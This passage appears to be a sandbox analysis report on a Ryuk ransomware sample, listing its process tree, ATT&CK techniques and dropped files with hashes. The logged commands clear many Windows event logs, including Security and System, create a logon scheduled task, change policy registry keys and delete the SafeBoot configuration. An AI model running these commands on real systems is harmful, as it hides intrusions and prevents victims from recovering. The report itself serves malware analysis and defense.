wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
3⤵
- Clears Windows event logs
PID:304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
3⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
3⤵
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
3⤵
PID:1012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
3⤵
PID:112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
3⤵
- Clears Windows event logs
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
3⤵
PID:304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
3⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
3⤵
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
3⤵
- Clears Windows event logs
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
3⤵
- Clears Windows event logs
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
3⤵
- Clears Windows event logs
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
3⤵
PID:112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
3⤵
- Clears Windows event logs
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
3⤵
- Clears Windows event logs
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
3⤵
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
3⤵
PID:304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
3⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
3⤵
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
3⤵
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
3⤵
PID:112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
3⤵
- Clears Windows event logs
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
3⤵
- Clears Windows event logs
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
3⤵
PID:304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
3⤵
- Clears Windows event logs
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
3⤵
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
3⤵
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
3⤵
- Clears Windows event logs
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
3⤵
PID:112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
3⤵
- Clears Windows event logs
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
3⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
3⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
3⤵
- Clears Windows event logs
PID:1532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
3⤵
PID:304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
3⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
3⤵
PID:2012

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
3⤵
PID:1044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
3⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
3⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
3⤵
PID:1028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
3⤵
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
3⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
3⤵
PID:1004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
3⤵
PID:2032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
3⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
3⤵
PID:1656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
3⤵
PID:1332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
3⤵
- Clears Windows event logs
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
3⤵
PID:1536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
3⤵
PID:1896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
3⤵
- Clears Windows event logs
PID:1088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
3⤵
PID:1600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
3⤵
PID:1076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
3⤵
PID:628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
3⤵
PID:1324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
3⤵
PID:564

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
3⤵
PID:240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
3⤵
- Clears Windows event logs
PID:616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
3⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
3⤵
PID:1284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
3⤵
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
3⤵
PID:912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
3⤵
PID:848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
3⤵
PID:1448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
3⤵
PID:612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
3⤵
PID:584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
3⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
3⤵
- Clears Windows event logs
PID:1672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
3⤵
PID:1724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
3⤵
PID:1460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
3⤵
PID:1708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
3⤵
PID:1972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
3⤵
PID:1664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
3⤵
- Clears Windows event logs
PID:976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
3⤵
PID:220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
3⤵
PID:576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
3⤵
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
3⤵
PID:1172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
3⤵
PID:1808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
3⤵
- Clears Windows event logs
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
3⤵
PID:1548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
3⤵
PID:1148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ntshrui"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
3⤵
PID:1880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "OAlerts"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Security"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Setup"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "System"
3⤵
- Clears Windows event logs
PID:780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "TabletPC_InputPanel_Channel"
3⤵
PID:1632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
3⤵
PID:1700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
3⤵
PID:2028

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
3⤵
PID:112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSetup"
3⤵
PID:1256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "WMPSyncEngine"
3⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Windows PowerShell"
3⤵
PID:1000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
3⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "muxencode"
3⤵
- Clears Windows event logs
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
2⤵
PID:560

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
3⤵
- Creates scheduled task(s)
PID:1904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
2⤵
PID:2000

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
3⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
2⤵
PID:1172

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
3⤵
PID:2012

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:2000

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID

Filesize
8B

MD5
d31013fefedfb315cf7677b15198f709

SHA1
420168b77fab2c9ef5b3dcfa3aa499845be1f26c

SHA256
ebd912b4778749e983f23e60c4d14d7d8b80ac6b8ca84f387517cfc5d8e7d9db

SHA512
7652509d218548a43b27df748e6f7ab49a57cb4193e190332dc6a33048fface9cf9f5357a55c1a65e3ec89a8b4b6b3890ae2dd5b1f3c3e1fe678078077c20fa2

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
d0484f1f0cdbb1714d57c85d6fde31af

SHA1
93bcd85444aa945d111a6d2c8c8114ff35d84355

SHA256
df35aa15068517fc7fe657442f0cad225c55cfe1273167f3f7647ada7d8a5e2a

SHA512
21003cd6122f9725792d0235e6b71ff4740f308a5770912aeb6825b42a0b332f275679d32117c88967f87d296ca52632d43f78ca1b4c90d05c3480abf7e2026c

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
e42e0fe191611360478184573049b535

SHA1
0337588dee8e9555846994aae1ce073f07362e7f

SHA256
68525230066e3c14959954e31a363f090bdb59ac2a3c792c2920eb0b09fdb6fd

SHA512
9ffaaf1bd1ce451c8561a41f18b7d8e22695220137c195d42db1946bdd5ae87bdd5ed5b2f17a107acf7c3d9e7f06d25cecf5d91ff7ea50e7b1a349c5d89c50b2

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
e42e0fe191611360478184573049b535

SHA1
0337588dee8e9555846994aae1ce073f07362e7f

SHA256
68525230066e3c14959954e31a363f090bdb59ac2a3c792c2920eb0b09fdb6fd

SHA512
9ffaaf1bd1ce451c8561a41f18b7d8e22695220137c195d42db1946bdd5ae87bdd5ed5b2f17a107acf7c3d9e7f06d25cecf5d91ff7ea50e7b1a349c5d89c50b2

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
ac9b14c576becae744db2011f9371f38

SHA1
23e5a5f84527e40314b00ff373af7c6157772123

SHA256
adf2c3a642c9149e6fc55756fc75583d431ed6ca635faadb09e538c97340320e

SHA512
